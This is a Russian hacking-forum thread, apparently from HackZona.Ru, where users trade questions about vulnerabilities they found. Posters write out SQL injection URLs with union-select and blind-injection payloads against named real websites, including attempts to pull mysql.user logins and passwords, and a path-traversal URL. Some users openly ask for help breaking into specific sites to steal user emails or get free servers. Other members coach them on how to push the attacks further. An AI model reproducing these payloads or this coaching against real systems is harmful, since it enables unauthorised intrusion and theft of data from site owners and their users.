Вопросы по уязвимостям — HackZona.Ru

Здесь задаем вопросы по найденым уязвимостям, и ждем(!!!) ответа. Никакого флейма, никаких просьб о взломе! Оставляю за собой право удалять посты без объяснения причины, и не надо по этому поводу писать мне в личку, она все равно заполнена на 100%)

Вопросы по уязвимостям

Сообщений в теме: 391
Нравится
Не нравится
Репутация: 0
Рейтинг: 0
Кол-во тем: 0
Сообщения: 0
Здесь задаем вопросы по найденым уязвимостям, и ждем(!!!) ответа.
Никакого флейма, никаких просьб о взломе!

Оставляю за собой право удалять посты без объяснения причины, и не надо по этому поводу писать мне в личку, она все равно заполнена на 100%)
Нравится
Не нравится
Репутация: 0
Рейтинг: 0
Кол-во тем: 0
Сообщения: 0
сенкс ...))
Нравится
Не нравится
Репутация: 0
Рейтинг: 0
Кол-во тем: 0
Сообщения: 0
Помогите взломать форум, можно даже не админку, просто нужна база с мылом пользователей етого форума. Форум
[url]http://bc-city.com/[/url]
движок Invision Power Board v2.1.6 © 2009 IPS, Inc
Начал копать нарыл что
логин администратора: admin
егоже мыло [email][email protected][/email]
получить пароль можно через восстановления пароля высылается на мыло [email][email protected][/email], только одно но я так понимаю раз у него @bc-city.com то ето какаято программа на его серваке типо почтового сервера, а как к ней подобраться даже соображений нет, что подскажите что мне делать если кто то может помочь готов проставиться
Нравится
Не нравится
Репутация: 0
Рейтинг: 0
Кол-во тем: 0
Сообщения: 0
Я даже не представляю как это заюзать:
[code]
Несколько уязвимостей обнаружено в Microsoft Internet Information Server (IIS) 6.0. Удаленный пользователь может выполнить XSS нападение против IIS администратора, чтобы получить ID сессии. Удаленный авторизованный пользователь может изменить пароль администратора, не вводя старый пароль.

Административный Web интерфейс не фильтрует HTMl код в «ReturnURL» параметре в нескольких ASP сценариях. Один из уязвимых сценариев — «Web_LogSettings.asp». Пример:

XXX.XXX.XXX.XXX:8098/admin/sh_taskframes.asp?Title=Configura ci%C3%B3n%20de%
20registro
%20Web&URL;=MasterSettings/Web_LogSettings.asp?tab1=TabsWebServer%
26tab2=TabsWebLogSettings%26
__SAPageKey=5742D5874845934A134CD05F39C63240&Ret; urnURL=">?tab1=TabsWebServer%26__SAPageKey=5742D5874845934A134CD05F39C63240%26
R=0.6756681557204625&R;=0.9895845379540951&__SAPag
eKey=5742D5874845934A134CD05F39C63240

Также сообщается, что удаленный заверенный администратор может вызвать «users/user_setpassword.asp сценарий, чтобы изменить пароль администратора к произвольному значению, не вводя предыдущее значение пароля. Т.е. пользователь, похитивший сессию администратора через XSS, может изменить пароль администратора.
[/code]
В смысле не понимаю, что надо изменить, помимо ХХХ на IP.
Нравится
Не нравится
Репутация: 0
Рейтинг: 0
Кол-во тем: 0
Сообщения: 0
[code]
tour.naughtyamerica.com/index.php?&m;=scenes≻_id=10&title;=mfsts&fan;_type=category&fan;_id=19999--&nats;=MTIxMjUwOjQ6MjE&shell;=mfst&PHPSESSID;=d76157dccb387dfab925273fd2172251
[/code]
если издеваться над fan_id то получаем
Notice: Array to string conversion in naughty/naughtycms.naughtyamerica.com/system/includes/functions.php on line 537

что можно из етого взять
Нравится
Не нравится
Репутация: 0
Рейтинг: 0
Кол-во тем: 0
Сообщения: 0
Имхо просто раскрытие путей
Нравится
Не нравится
Репутация: 0
Рейтинг: 0
Кол-во тем: 0
Сообщения: 0
У меня проблемка с инъекцией… в общем нашёл скульку на сайте, знаю даже имена таблиц но открыть путь к внутренностям таблиц немогу (немогу собственно даже версию MySQL проверить)

Смотрите сами…

sao.mos.ru/?r=9_9&cat;=16&type;=28+union+select+1,2,3,4/*

может кто подскажет что с этим сделать :(
Нравится
Не нравится
Репутация: 0
Рейтинг: 0
Кол-во тем: 0
Сообщения: 0
проблема в кодовых страницах:
sao.mos.ru/?r=9_9&cat;=16&type;=28+union+select+1,unhex(hex(version())),3,4/*
Нравится
Не нравится
Репутация: 0
Рейтинг: 0
Кол-во тем: 0
Сообщения: 0
Я уже спрашивал, но спрошу еще раз ) Просто появились еще вопросы) Есть сайт )) Допустим sitename.ru/ Там есть такой раздел index.php?categoryid=1&p45;_yearid=1 )) Делую так sitename.ru/index.php?categoryid=1&p45;_yearid=1' выводиться ошибка ) Нашел ошибку спайдером )) Дальше делал так sitename.ru/index.php?categoryid=1&p45;_yearid=1+union+select+1,2,3,concat(user,0x3a,password)+from+mysql.user/* )) Все нормально )) Должны были выдаться заветные логины и пароли, но не отабразились ) Ошибка отобразилась в календаре ))

База данных Sabdrimer CMS

Неправильный SQL: SELECT title, categoryid, articleid, IF(datestart = 0, IF(dateupdated = 0, datecreated, dateupdated), datestart) AS date
FROM sd_p2_news
WHERE (settings & 2)
AND MONTH(FROM_UNIXTIME(IF(datestart = 0, IF(dateupdated = 0, datecreated, dateupdated), datestart))) = 3 AND
YEAR(FROM_UNIXTIME(IF(datestart = 0, IF(dateupdated = 0, datecreated, dateupdated), datestart))) = 1'
Ошибка: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '' at line 5
Номер ошибки: 1064
Дата: Saturday 14th 2009f March 2009 01:11:32 AM
Файл: sitename.ru/index.php

Я когда подобрал столбцы они нигде не отобразились ) Думал может пароли с лагинами где-то отобразились, но нет ) Почему? Мне ответили, что нет доступа в mysql.user)) Но а почемуже когда я хочу даже просто посматреть версию все равно нигде не отражаеться? По сути должно отразиться в календаре, там же где и ошибка ) Версию я смотрел так sitename.ru/index.php?categoryid=1&p45;_yearid=1+union+select+1,2,3,version()/* Запрос выполняеться ) все нормально) НО не отображаеться то, что мне нужно )
Нравится
Не нравится
Репутация: 0
Рейтинг: 0
Кол-во тем: 0
Сообщения: 0
SilverHawk кажется имеет в виду вот это:
[code]http://www.garantie.ru/index.php?categoryid=1&p45;_yearid=1%27
www.garantie.ru/index.php?categoryid=1&p45;_yearid=1+union+select+1,2,3,4+from+mysql.user+--+
Ошибка: SELECT command denied to user 'garantie_admin'@'localhost' for table 'user' [/code]
p.s. у меня тоже чтот не получается вывести хотя бы версию мускуля… мб там вывода нету? :oops:
Нравится
Не нравится
Репутация: 0
Рейтинг: 0
Кол-во тем: 0
Сообщения: 0
SilverHawk единственный вариант пока это посимвольный перебор (пока, потому что я движек не смотрел)
в твоем случае универсальный вариант такой:
/index.php?categoryid=3&p45;_yearid=2009 and 1=if(substring(version(),1,1)=4,1,(select 1 union select 2))

можно также и через OR делать
/index.php?categoryid=3&p45;_yearid=2009 or substring(version(),1,1)=4
, но это не получится, если в календаре не отмечены события
Нравится
Не нравится
Репутация: 0
Рейтинг: 0
Кол-во тем: 0
Сообщения: 0
Всем привет поднимаю ещё раз свой вопрос, так как в придедущей теме поднимал так толком некто и не смог помочь.

Возможно ли сюда залить щел если имеется такого рода уязвимость

swonline.ru/picture.php?dir=../../../../var/www/

2. нашол Sql инекцию тока не совсем понел как её раскрутить если кто может помочь за ранее спс.

www.semperium.ru/reg.php?link=users'
Нравится
Не нравится
Репутация: 0
Рейтинг: 0
Кол-во тем: 0
Сообщения: 0
1. возможность читать папки на серве может очень сильно помочь во взломе, но непосредственно через эту читалку каталогов шелл не залить
2. Инъекции не увидел
Нравится
Не нравится
Репутация: 0
Рейтинг: 0
Кол-во тем: 0
Сообщения: 0
Scipio, DrAss, помогите)))
Вот нашёл скулю
[code]
www.tusculumpioneers.com/sport.php?id=10'
[/code]
Но максимум дошёл до
[code]
www.tusculumpioneers.com/sport.php?id=-10+union+select+1,2,aes_decrypt(aes_encrypt(version(),0x61),0x61),4,5,6,7,8,9,10,11,12+--+
[/code]
Объясните, что и как дальше?
Нравится
Не нравится
Репутация: 0
Рейтинг: 0
Кол-во тем: 0
Сообщения: 0
Саш, не согласен, инжект есть:
www.semperium.ru/reg.php?link=usersasdf
— E009: Database error: SELECT ARRAY FAILED FOR: usersasdf
Table 'db_semperium1.usersasdf' doesn't exist
— Инжект как раз таки в поле FROM
Нравится
Не нравится
Репутация: 0
Рейтинг: 0
Кол-во тем: 0
Сообщения: 0
[quote=«EFlame»]Саш, не согласен, инжект есть:
[url]http://www.semperium.ru/reg.php?link=usersasdf[/url]
— E009: Database error: SELECT ARRAY FAILED FOR: usersasdf
Table 'db_semperium1.usersasdf' doesn't exist
— Инжект как раз таки в поле FROM[/quote]

Да, Дим, видел я это, но опять же инъекции не увидел, тут уже вопрос философский что считать инъекцией, в данном случае нельзя вставить в запрос ничего кроме букв и цифр, и если считать такое инъекцией, неважно где после фром, после вер, после селект, то и
http://www.microsoft.com/downloads/details.aspx?FamilyID=0856eacb-4362-4b0d-8edd-aab15c5e04f5&displayLang;=en
http://www.microsoft.com/downloads/details.aspx?FamilyID=0856eacb-4362-4b0d-8edd-aab15c5e04f5&displayLang;=ru

чем не инъекция? мы же можем инжектировать свои значения в displayLang, конечно толку от этого никакого как и в случае sem3000, посути это тоже самое, что и в примере который привел я, с той лишь разницей, что в одном случае «инъекция» после фром, во втором случае «инъекция» после вер.
Нравится
Не нравится
Репутация: 0
Рейтинг: 0
Кол-во тем: 0
Сообщения: 0
Здраствуйте.
Вот решил взяться за взлом сайта Forteam, сайт посвящён хостингу сервов кс(думал что обеспечу себя бесплатным сервом)
Но вот пока что не получаеться.
Нашёл несуколоько уязвимочтей, хотя сам не знаю чё нашёл
Распишу всё подробно:
1.Если пишиш линку сам, то тебя показывает как пользователя уже зашедшого, но не пишет с какого меила( можно ли ето раскрурить?)
2.Если пишеш вначале /index/ а птом /login/ выдаёт
Notice: Undefined index: email in /home/forteam/forteam2/index.php on line 196

Notice: Undefined index: pass in /home/forteam/forteam2/index.php on line 196

Fatal error: Placeholder returns error SELECT * FROM ft_users WHERE email = UNKNOWN_PLACEHOLDER_0 AND pass LIKE? in /home/forteam/forteam2/index.php on line 196 in /home/forteam/forteam2/lib/db.inc.php on line 80

3. И последнее я нашёл что-то тип редактора сайта, но с ним я не могу ничего редактировать как правильно составить линку?(начальная линка /editor.html)

И вот сразу линка сайта который я хочу взломать forteam.ru/

Надеюсь поможете… Заранее спасибо!
Нравится
Не нравится
Репутация: 0
Рейтинг: 0
Кол-во тем: 0
Сообщения: 0
вот inj
[code]
www.tutpricol.ru/message.php?id=143999+union+select+11,22,33,44,55--
[/code]
видим 44 22 33.

почему катит так
[code]
www.tutpricol.ru/message.php?id=143999+union+select+11+blablabla,22+blublublu,33+bliblibli,44+blobloblo,55--
[/code]

почему не ругается на blablabla,blublublu,blublublu,blobloblo?????

но если вместо них вбить любое зарезервированное слово например select то ругается на селект

так уже не катит
[code]
www.tutpricol.ru/message.php?id=143999+union+select+11+blablabla,22+blublublu,33+bliblibli,44+blobloblo+ggggg,55--
[/code]

на локалке
[code]
localhost/test.php?id=-1+union+select+1,2+wwww+ssss,3--
[/code]

получаем unknown column ssss

?????????????????????????????????????????????????????????????????????
Нравится
Не нравится
Репутация: 0
Рейтинг: 0
Кол-во тем: 0
Сообщения: 0
Да по идее то должен ругаться, abdullla, иногда кодеров не понять, возможно какойто парсер массива _GET, или какойто недоделаннный фильтр, вобщем этот вопрос только к кодерам, потому как то, что они хотели сделать, знает лишь мудрец мохнатый. Ну или надо хекать сайт и смотреть скрипты
Нравится
Не нравится
Репутация: 0
Рейтинг: 0
Кол-во тем: 0
Сообщения: 0
дело не в сайте.
вот тестил на локалке

[code]
$query='select * from users where id=-1 union select 1,2,3,4,5,6';
$query1='select * from users where id=-1 union select 1,2 aaa,3 bbb,4 ccc,5 ddd,6';
if(!($query_id = mysql_query($query1, $db_id))) {
echo mysql_error().'
';
echo mysql_errno().'
';
die;
}
while($row = mysql_fetch_assoc($query_id)) {
echo $row['id'].' ';
echo $row['login'].' ';
echo $row['password'].'
';
}
[/code]

оба query один и тотже вывод, тут или mysql_query() или сам mysql.

при $query='select * from users where id=-1 union select 1,2 aaa gggg,3 bbb,4 ccc,5 ddd,6';
[code]
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'gggg,3 bbb,4 ccc,5 ddd,6' at line 1
[/code]

так тоже катит
[code]
$query1='select * from users where id=-1 union select 1,login sss,3,4,5,6 from users limit 1';
[/code]
Нравится
Не нравится
Репутация: 0
Рейтинг: 0
Кол-во тем: 0
Сообщения: 0
я оченно ма сильно извиняюсь насяльника, такие конструкции действительно позволены в мускуле а именно:
select 1 aaa
тоже самое что и
select 1 as aaa
Нравится
Не нравится
Репутация: 0
Рейтинг: 0
Кол-во тем: 0
Сообщения: 0
пока писал уже опередили

[code]
$query='select 1,2 bbb,3 bbb,4 sss,5,6';
$query1='select 1,2 as bbb,3 as bbb,4 as sss,5,6';
if(!($query_id = mysql_query($query1, $db_id))) {
echo mysql_error().'
';
echo mysql_errno().'
';
die;
}
while($row = mysql_fetch_assoc($query_id)) {
print_r($row);
}

[/code]

оба query дают
[code]
Array ( [1] => 1 [bbb] => 3 [sss] => 4 [5] => 5 [6] => 6 )
[/code]
оказывается можно пропускать ' as ' :)
Нравится
Не нравится
Репутация: 0
Рейтинг: 0
Кол-во тем: 99
Сообщения: 0
[QUOTE=Svik;139162]

Пример:

POST /EEYE.html HTTP/1.1
Host: [URL=«www.eeye2002.com/»]www.EEYE2002.com[/URL]
Transfer-Encoding: chunked
Content-Length: 22
4
EEYE
7FFFFFFF
[DATA]

как этим воспользоватся я примерно знаю ну как дать эту команду сайту вбивая в браузер не удивительно переходит на яндекс и пишет типо результатов нет может посоветуете. плиз.[/QUOTE]

Нужно отправить http пакет на адрес уязвимого сайта. Например, воспользовавшись расширением для файэрфокса [URL=«addons.mozilla.org/ru/firefox/addon/tamper-data/»]tamper-data[/URL]
Нравится
Не нравится
Репутация: 0
Рейтинг: 0
Кол-во тем: 0
Сообщения: 0
2Kerny потому что это MS Access
2agata никак, нельзя
Нравится
Не нравится
Репутация: 0
Рейтинг: 0
Кол-во тем: 0
Сообщения: 0
у мну такой вопрос: при заходе на [url]http://www.xtopia-konferenz.de[/url], сразу идет редирект на
[url]http://www.xtopia-konferenz.de/Startseite_xt08.mspx?ActiveID=1183[/url] подставляю всем любимую кавычку и сервер плюет такую ошибку:
[code] Server Error in '/' Application.
— Input string was not in a correct format.
Description: An unhandled exception occurred during the execution of the current web request. Please review the stack trace for more information about the error and where it originated in the code.

Exception Details: System.FormatException: Input string was not in a correct format.

Source Error:

An unhandled exception was generated during the execution of the current web request. Information regarding the origin and location of the exception can be identified using the exception stack trace below.

Stack Trace:

[FormatException: Input string was not in a correct format.]
System.Number.StringToNumber(String str, NumberStyles options, NumberBuffer& number, NumberFormatInfo info, Boolean parseDecimal) +7469351
System.Number.ParseInt32(String s, NumberStyles style, NumberFormatInfo info) +119
System.Convert.ToInt32(String value) +63
Axinom.Framework.Web.WebUtility.RequestNumber(String strKey, Int32 intDefault) +63
Axinom.AECMS.HttpHandler.LiveHttpHandler.DoProcessRequest() +108
Axinom.AECMS.HttpHandler.BaseHttpHandler.ProcessRequest(HttpContext context) +85
System.Web.CallHandlerExecutionStep.System.Web.HttpApplication.IExecutionStep.Execute() +181
System.Web.HttpApplication.ExecuteStep(IExecutionStep step, Boolean& completedSynchronously) +75

— Version Information: Microsoft .NET Framework Version:2.0.50727.3082; ASP.NET Version:2.0.50727.3082
[/code]

ошибка понятна, но как его можна заюзать? и можно ли это отнести к уязвимости?
Нравится
Не нравится
Репутация: 0
Рейтинг: 0
Кол-во тем: 0
Сообщения: 0
народ обьясните как быть с этим:
[code]http://www.wwf.ru/about/people/tab63/?oid.in=240,242,121'
[/code]
хотелось бы добавить одну новость до отключения света :)
2 3
Для того, чтобы отвечать в темах на форуме необходимо войти на сайт или зарегистрироваться.